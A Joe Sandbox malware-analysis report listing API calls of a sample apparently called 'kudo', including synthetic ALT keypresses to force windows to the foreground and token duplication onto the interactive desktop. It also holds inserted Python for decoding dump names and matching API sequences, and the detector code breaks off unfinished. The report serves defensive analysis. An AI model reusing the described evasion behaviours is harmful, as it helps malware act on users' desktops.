                                                      • Opcode Fuzzy Hash: c6d7ad2e117291b041c698b4ece4e10fa3fab7f641502d477498095d96ef4374
                                                      • Instruction Fuzzy Hash: C0F039B1641711CFCB749F68E894812BBE1FF143793209A3EE2D6C2660C732A880DF40
                                                      APIs
                                                      • GetLongPathNameW.KERNEL32(?,?,00007FFF,?,?,?,008072BD,00000001,008C6290,?,00803BBB,008C52F8,008C52E0,?,?), ref: 008207B0
                                                        • Part of subcall function 00807BCC: _memmove.LIBCMT ref: 00807C06
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: LongNamePath_memmove
                                                      • String ID:
                                                      • API String ID: 2514874351-0
                                                      • Opcode ID: 0c7dc1fc228853e9e4f41bcaa08f8d7a586f73eaa51d3a5e7273d7e5ae8e5fa2
                                                      • Instruction ID: bcec31e7549b0159b50c0abcee22e29864c7874175b6042b6f5dfe230f99cca4
                                                      • Opcode Fuzzy Hash: 0c7dc1fc228853e9e4f41bcaa08f8d7a586f73eaa51d3a5e7273d7e5ae8e5fa2
                                                      • Instruction Fuzzy Hash: A3E0CD3690412857C720D65C9C05FEA77DDEFC87A0F0541B5FD0CD7245DE60AC8086D1
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: __fread_nolock
                                                      • String ID:
                                                      • API String ID: 2638373210-0
                                                      • Opcode ID: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                                      • Instruction ID: 045d1df278ed5684a1650d72c60e4778c5ac1ec4050dd0263bf7afe5ea7c774a
                                                      • Opcode Fuzzy Hash: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                                      • Instruction Fuzzy Hash: 3DE092B0104B009FD7388A24D801BA373E1FB05304F00091DF2AAC3241EF63B8418B59
                                                      APIs
                                                      • GetFileAttributesW.KERNEL32(?), ref: 00A3D9C3
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457539916.0000000000A3D000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A3D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_a3d000_kudo.jbxd
                                                      Similarity
                                                      • API ID: AttributesFile
                                                      • String ID:
                                                      • API String ID: 3188754299-0
                                                      • Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                                      • Instruction ID: 8060770d713dd1fc8619f95a155b6887e39b57a4e8b3791f61677ff8e0c08349
                                                      • Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                                      • Instruction Fuzzy Hash: 7DE08C3190520CEBCB20CBB8A905BAE73A8BB08321F204656B806C7680D5308E00E750
                                                      APIs
                                                        • Part of subcall function 00823217: __lock.LIBCMT ref: 00823219
                                                      • __onexit_nolock.LIBCMT ref: 00822C60
                                                        • Part of subcall function 00822C88: RtlDecodePointer.NTDLL(?), ref: 00822C9B
                                                        • Part of subcall function 00822C88: RtlDecodePointer.NTDLL ref: 00822CA6
                                                        • Part of subcall function 00822C88: __realloc_crt.LIBCMT ref: 00822CE7
                                                        • Part of subcall function 00822C88: __realloc_crt.LIBCMT ref: 00822CFB
                                                        • Part of subcall function 00822C88: RtlEncodePointer.NTDLL(00000000), ref: 00822D0D
                                                        • Part of subcall function 00822C88: RtlEncodePointer.NTDLL(0083B5BA), ref: 00822D1B
                                                        • Part of subcall function 00822C88: RtlEncodePointer.NTDLL(00000004), ref: 00822D27
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Pointer$Encode$Decode__realloc_crt$__lock__onexit_nolock
                                                      • String ID:
                                                      • API String ID: 3536590627-0
                                                      • Opcode ID: b03b71f61347d10c9c5a835f5fa60949ff448ebb09cf56e25347f536a917dc67
                                                      • Instruction ID: 97f4b5db47318d3c97b3d7f2d3d40bca362b0bc61eb9a83f24116307f86051fc
                                                      • Opcode Fuzzy Hash: b03b71f61347d10c9c5a835f5fa60949ff448ebb09cf56e25347f536a917dc67
                                                      • Instruction Fuzzy Hash: 92D01271D5122DEADB11BBACA90675C7AA0FF10722F508244F054E61C2CBBC4BC18B83
                                                      APIs
                                                      • SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001), ref: 00805C5F
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: FilePointer
                                                      • String ID:
                                                      • API String ID: 973152223-0
                                                      • Opcode ID: 70196a304b4c1ef50888bcdaa82f31ebf87e2497d37ae0c6affeddbd7e710eaa
                                                      • Instruction ID: fb288a11c540d099f9225cc1785282de70e37703c06fc7fa89a971175068def1
                                                      • Opcode Fuzzy Hash: 70196a304b4c1ef50888bcdaa82f31ebf87e2497d37ae0c6affeddbd7e710eaa
                                                      • Instruction Fuzzy Hash: E9D0C77464020CBFE710DB84DC46FA9777CE705710F200194FE0456291D6B27D508795
                                                      APIs
                                                      • GetFileAttributesW.KERNEL32(?), ref: 00A3D993
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457539916.0000000000A3D000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A3D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_a3d000_kudo.jbxd
                                                      Similarity
                                                      • API ID: AttributesFile
                                                      • String ID:
                                                      • API String ID: 3188754299-0
                                                      • Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                                      • Instruction ID: ee7d8fe6ac3d8fd2efaf8613b1b4787ac58f72f13f7a07f5e0469922fd82932f
                                                      • Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                                      • Instruction Fuzzy Hash: D8D0A77290520CEBCB10DFF4AD04ADD73A8D749330F104754FD15C7280D5319D009751
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: __wfsopen
                                                      • String ID:
                                                      • API String ID: 197181222-0
                                                      • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                      • Instruction ID: c55728a3be80fae1fce41ea41e945209dec5b7186d283d67de4621901b15cb5b
                                                      • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                      • Instruction Fuzzy Hash: EAB0927648020CB7CE012A86FC02A593B1AEB41B64F408020FB0C181A2A673A6A49A8A
                                                      APIs
                                                      • GetLastError.KERNEL32(00000002,00000000), ref: 0086D1FF
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast
                                                      • String ID:
                                                      • API String ID: 1452528299-0
                                                      • Opcode ID: effc9abf6ac745cece9aaca46c3bcc2232c46ecfab3ef9c8c3d04e1c434b1caf
                                                      • Instruction ID: d5a8660a3f9915fa445c840b0c8015c603220d52cf19e4d173f9ed736d8b09d0
                                                      • Opcode Fuzzy Hash: effc9abf6ac745cece9aaca46c3bcc2232c46ecfab3ef9c8c3d04e1c434b1caf
                                                      • Instruction Fuzzy Hash: 9E716E706043058FCB44EF68D8A1A6AB7E0FF99314F05492DF996DB3A2DB30E945CB52
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457539916.0000000000A3D000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A3D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_a3d000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Sleep
                                                      • String ID:
                                                      • API String ID: 3472027048-0
                                                      • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                      • Instruction ID: c139237ee4940abb94aa124dc7e090416d147ddbbfe95e266157eebcab569fa3
                                                      • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                      • Instruction Fuzzy Hash: 87E0E67594010DDFDB00DFB4D54969D7BB4EF04302F100161FD01D2280D6309D508A62
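The dotted .sdmp names in the Memory Dump Source entries above carry the region's base address and two fields whose values coincide with the Win32 PAGE_* and MEM_* constants (00000040 = PAGE_EXECUTE_READWRITE, 01000000 = MEM_IMAGE, 00020000 = MEM_PRIVATE). The parser below is an added example written by the editor, not Joe Sandbox code: the field layout it assumes is inferred from the names on this page, fields six and eight are kept verbatim as undecoded, the names list is copied from the entries above, and the function and class names are the editor's own. It flags regions that are writable and executable at the same time, which is where unpacked code such as the Sleep-calling function dumped from the non-PE private region at 00A3D000 is found.

```python
"""Added example (editor's code, not Joe Sandbox's): decode the dotted fields of
the .sdmp memory-dump names used in this report.  The field layout is an
assumption inferred from the names on this page; only fields 5 and 7 are
interpreted, because their values coincide with Win32 PAGE_* / MEM_* constants."""
from dataclasses import dataclass
from typing import List

PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}


@dataclass(frozen=True)
class DumpRegion:
    process_index: int   # field 1: index of the analysed process (5 on this page)
    snapshot: int        # field 2: 2 on every dump in this report
    dump_id: str         # field 3: decimal-looking id, kept verbatim
    base: int            # field 4: virtual address the region was dumped from
    protect: int         # field 5: coincides with PAGE_* values (assumption)
    field6: int          # field 6: not decoded
    mem_type: int        # field 7: coincides with MEM_* values (assumption)
    field8: int          # field 8: not decoded

    @property
    def protect_name(self) -> str:
        return PAGE_PROTECT.get(self.protect, f"unknown(0x{self.protect:X})")

    @property
    def type_name(self) -> str:
        return MEM_TYPE.get(self.mem_type, f"unknown(0x{self.mem_type:X})")

    @property
    def writable_executable(self) -> bool:
        # W and X together is the property that matters when hunting unpacked code.
        return self.protect in (0x40, 0x80)


def parse_dump_name(name: str) -> DumpRegion:
    """Split '<8 dotted fields>.sdmp' into a DumpRegion; hex fields are parsed as hex."""
    p = name.strip().split(".")
    if len(p) != 9 or p[8] != "sdmp":
        raise ValueError(f"not a Joe Sandbox .sdmp name: {name!r}")
    return DumpRegion(int(p[0], 16), int(p[1], 16), p[2], int(p[3], 16),
                      int(p[4], 16), int(p[5], 16), int(p[6], 16), int(p[7], 16))


def writable_executable_regions(names: List[str]) -> List[DumpRegion]:
    return [r for r in map(parse_dump_name, names) if r.writable_executable]


def summarize(name: str) -> str:
    r = parse_dump_name(name)
    return f"proc#{r.process_index} base=0x{r.base:08X} {r.protect_name} {r.type_name}"


# Dump names copied from the Memory Dump Source entries of this report.
NAMES = [
    "00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp",
    "00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp",
    "00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp",
    "00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp",
    "00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp",
    "00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp",
    "00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp",
    "00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp",
    "00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp",
    "00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp",
    "00000005.00000002.457539916.0000000000A3D000.00000040.00000020.00020000.00000000.sdmp",
]

if __name__ == "__main__":
    for n in NAMES:
        print(summarize(n))
```

Run stand-alone it prints one line per dump; the image-backed pages at 00801000 through 00947000 come out as PAGE_EXECUTE_READWRITE rather than the PAGE_EXECUTE_READ a normally mapped .text section would show, and the private region at 00A3D000 is executable with no PE header, so both are worth pulling first when triaging the dumps.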
                                                      APIs
                                                        • Part of subcall function 00802612: GetWindowLongW.USER32(?,000000EB), ref: 00802623
                                                      • NtdllDialogWndProc_W.NTDLL(?,0000004E,?,?,?,?,?,?), ref: 0088CB37
                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0088CB95
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 0088CBD6
                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0088CC00
                                                      • SendMessageW.USER32 ref: 0088CC29
                                                      • _wcsncpy.LIBCMT ref: 0088CC95
                                                      • GetKeyState.USER32(00000011), ref: 0088CCB6
                                                      • GetKeyState.USER32(00000009), ref: 0088CCC3
                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0088CCD9
                                                      • GetKeyState.USER32(00000010), ref: 0088CCE3
                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0088CD0C
                                                      • SendMessageW.USER32 ref: 0088CD33
                                                      • SendMessageW.USER32(?,00001030,?,0088B348), ref: 0088CE37
                                                      • SetCapture.USER32(?), ref: 0088CE69
                                                      • ClientToScreen.USER32(?,?), ref: 0088CECE
                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 0088CEF5
                                                      • ReleaseCapture.USER32 ref: 0088CF00
                                                      • GetCursorPos.USER32(?), ref: 0088CF3A
                                                      • ScreenToClient.USER32(?,?), ref: 0088CF47
                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 0088CFA3
                                                      • SendMessageW.USER32 ref: 0088CFD1
                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 0088D00E
                                                      • SendMessageW.USER32 ref: 0088D03D
                                                      • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0088D05E
                                                      • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0088D06D
                                                      • GetCursorPos.USER32(?), ref: 0088D08D
                                                      • ScreenToClient.USER32(?,?), ref: 0088D09A
                                                      • GetParent.USER32(?), ref: 0088D0BA
                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 0088D123
                                                      • SendMessageW.USER32 ref: 0088D154
                                                      • ClientToScreen.USER32(?,?), ref: 0088D1B2
                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0088D1E2
                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 0088D20C
                                                      • SendMessageW.USER32 ref: 0088D22F
                                                      • ClientToScreen.USER32(?,?), ref: 0088D281
                                                      • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0088D2B5
                                                        • Part of subcall function 008025DB: GetWindowLongW.USER32(?,000000EB), ref: 008025EC
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 0088D351
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                       • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$ClientScreen$LongWindow$State$CaptureCursorMenuPopupTrack$DialogInvalidateNtdllParentProc_RectRelease_wcsncpy
                                                      • String ID: @GUI_DRAGID$F
                                                      • API String ID: 302779176-4164748364
                                                      • Opcode ID: f73b09d8d095fd7fccb72630f9feb85b25e1a4c58464f3c22375df2be6b7f4bb
                                                      • Instruction ID: cdd927c7625440d00c18a39456455c0ab8f789782fcb7136b394ea279d81aa7e
                                                      • Opcode Fuzzy Hash: f73b09d8d095fd7fccb72630f9feb85b25e1a4c58464f3c22375df2be6b7f4bb
                                                      • Instruction Fuzzy Hash: FE42AD74204741AFDB20EF28C848EAABBE5FF49320F140629F659C72B5D771E844DB62
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                       • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: _memmove$_memset
                                                      • String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                                      • API String ID: 1357608183-1798697756
                                                      • Opcode ID: 4074268cbe372d80987b8a0f9c932abe27a692540b4600758db7440d39d3c0ae
                                                      • Instruction ID: 5f3da692b721eae4a7de49f743420b085d549a93788b14b0b090983642608bd0
                                                      • Opcode Fuzzy Hash: 4074268cbe372d80987b8a0f9c932abe27a692540b4600758db7440d39d3c0ae
                                                      • Instruction Fuzzy Hash: A1939D75A04219DBDB24CFA8C881BEDB7B1FF48355F24816AED45EB281E7709E85CB40
                                                      APIs
                                                      • GetForegroundWindow.USER32 ref: 008048DF
                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0083D665
                                                      • IsIconic.USER32(?), ref: 0083D66E
                                                      • ShowWindow.USER32(?,00000009), ref: 0083D67B
                                                      • SetForegroundWindow.USER32(?), ref: 0083D685
                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0083D69B
                                                      • GetCurrentThreadId.KERNEL32 ref: 0083D6A2
                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 0083D6AE
                                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 0083D6BF
                                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 0083D6C7
                                                      • AttachThreadInput.USER32(00000000,?,00000001), ref: 0083D6CF
                                                      • SetForegroundWindow.USER32(?), ref: 0083D6D2
                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0083D6E7
                                                      • keybd_event.USER32(00000012,00000000), ref: 0083D6F2
                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0083D6FC
                                                      • keybd_event.USER32(00000012,00000000), ref: 0083D701
                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0083D70A
                                                      • keybd_event.USER32(00000012,00000000), ref: 0083D70F
                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0083D719
                                                      • keybd_event.USER32(00000012,00000000), ref: 0083D71E
                                                      • SetForegroundWindow.USER32(?), ref: 0083D721
                                                      • AttachThreadInput.USER32(?,?,00000000), ref: 0083D748
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                       • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                      • String ID: Shell_TrayWnd
                                                      • API String ID: 4125248594-2988720461
                                                      • Opcode ID: fa9108320540ed23bf8595b96e262749423e028cb6618596724c69a196e64160
                                                      • Instruction ID: 7be90da7e8f7e26a3a1178c434a7668be05895544a4b57453fcfc1bfbe6f301a
                                                      • Opcode Fuzzy Hash: fa9108320540ed23bf8595b96e262749423e028cb6618596724c69a196e64160
                                                      • Instruction Fuzzy Hash: 26317271A40318BBEB206B659C4AF7F7E6CFB84B50F104025FB05EA1D2D6B05911ABE0
                                                      APIs
                                                        • Part of subcall function 008587E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0085882B
                                                        • Part of subcall function 008587E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00858858
                                                        • Part of subcall function 008587E1: GetLastError.KERNEL32 ref: 00858865
                                                      • _memset.LIBCMT ref: 00858353
                                                      • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 008583A5
                                                      • CloseHandle.KERNEL32(?), ref: 008583B6
                                                      • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 008583CD
                                                      • GetProcessWindowStation.USER32 ref: 008583E6
                                                      • SetProcessWindowStation.USER32(00000000), ref: 008583F0
                                                      • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0085840A
                                                        • Part of subcall function 008581CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00858309), ref: 008581E0
                                                        • Part of subcall function 008581CB: CloseHandle.KERNEL32(?), ref: 008581F2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                       • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                      • String ID: $default$winsta0
                                                      • API String ID: 2063423040-1027155976
                                                      • Opcode ID: adfd69c637389f53fa90f1bb929958d37f7feabfbe622ae2402f5994187a3e6f
                                                      • Instruction ID: a3b665ff41ead2631233775976704562ae3395d0bb181cd2fa82fd73439b51bd
                                                      • Opcode Fuzzy Hash: adfd69c637389f53fa90f1bb929958d37f7feabfbe622ae2402f5994187a3e6f
                                                      • Instruction Fuzzy Hash: 85812575900209EEDF119FA8DC45AEEBBB9FF08305F14416AFD14F6261EB318A189B21
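Two of the call sequences listed above are more useful as signatures than as reading material: the AttachThreadInput / keybd_event(00000012) / SetForegroundWindow / AttachThreadInput run at 0083D6BF to 0083D748 (virtual key 0x12 is VK_MENU, and a synthetic ALT press is the long-standing way to satisfy the foreground-lock rules SetForegroundWindow enforces), and the DuplicateTokenEx / OpenWindowStationW(winsta0) / SetProcessWindowStation / OpenDesktopW(default) run at 008583A5 to 0085840A, which prepares a duplicated token for use on the interactive desktop. The code below is an added example written for this page, not Joe Sandbox or sample code: it parses listing lines in the exact format shown here and matches ordered API subsequences against them. The listing strings inside it are copied (the first one abridged) from the entries above; the two pattern definitions and the names parse_listing, match_sequence and scan are the editor's own.

```python
"""Added example (editor's code, not Joe Sandbox's or the sample's): parse the
'APIs' listing lines of a Joe Sandbox function entry and match ordered API call
sequences against them.  Listing text below is copied from this report; the
pattern definitions are the editor's own heuristics."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# One listing line.  Forms seen in the report:
#   • keybd_event.USER32(00000012,00000000), ref: 0083D6F2
#   • GetCurrentThreadId.KERNEL32 ref: 0083D6A2
#   •   Part of subcall function 008587E1: GetLastError.KERNEL32 ref: 00858865
LINE_RE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: Tuple[str, ...]
    ref: int                    # address of the call site
    subcall_of: Optional[int]   # callee address for a "Part of subcall" line, else None


def parse_listing(text: str) -> List[ApiCall]:
    """Calls in listing order; headers such as 'APIs'/'Strings' are skipped."""
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        args = tuple(a.strip() for a in m["args"].split(",")) if m["args"] else ()
        sub = int(m["sub"], 16) if m["sub"] else None
        calls.append(ApiCall(m["api"], m["module"], args, int(m["ref"], 16), sub))
    return calls


# A step is (API name, argument index to check, expected literal); None = any.
Step = Tuple[str, Optional[int], Optional[str]]
PATTERNS: Dict[str, List[Step]] = {
    # Attach to the foreground thread, synthetic ALT press (VK_MENU = 0x12),
    # SetForegroundWindow, detach: the sequence at 0083D6BF..0083D748 above.
    "forced_foreground_alt_keypress": [
        ("AttachThreadInput", None, None),
        ("keybd_event", 0, "00000012"),
        ("SetForegroundWindow", None, None),
        ("AttachThreadInput", 2, "00000000"),
    ],
    # Duplicated token plus explicit winsta0/default: the sequence at
    # 008583A5..0085840A above.
    "token_to_interactive_desktop": [
        ("DuplicateTokenEx", None, None),
        ("OpenWindowStationW", 0, "winsta0"),
        ("SetProcessWindowStation", None, None),
        ("OpenDesktopW", 0, "default"),
    ],
}


def match_sequence(calls: List[ApiCall], steps: List[Step]) -> Optional[List[int]]:
    """Ordered-subsequence match; returns the matched call-site addresses or None."""
    matched: List[int] = []
    i = 0
    for c in calls:
        api, idx, want = steps[i]
        if c.api != api:
            continue
        if idx is not None and (idx >= len(c.args) or c.args[idx] != want):
            continue
        matched.append(c.ref)
        i += 1
        if i == len(steps):
            return matched
    return None


def scan(text: str) -> Dict[str, List[int]]:
    calls = parse_listing(text)
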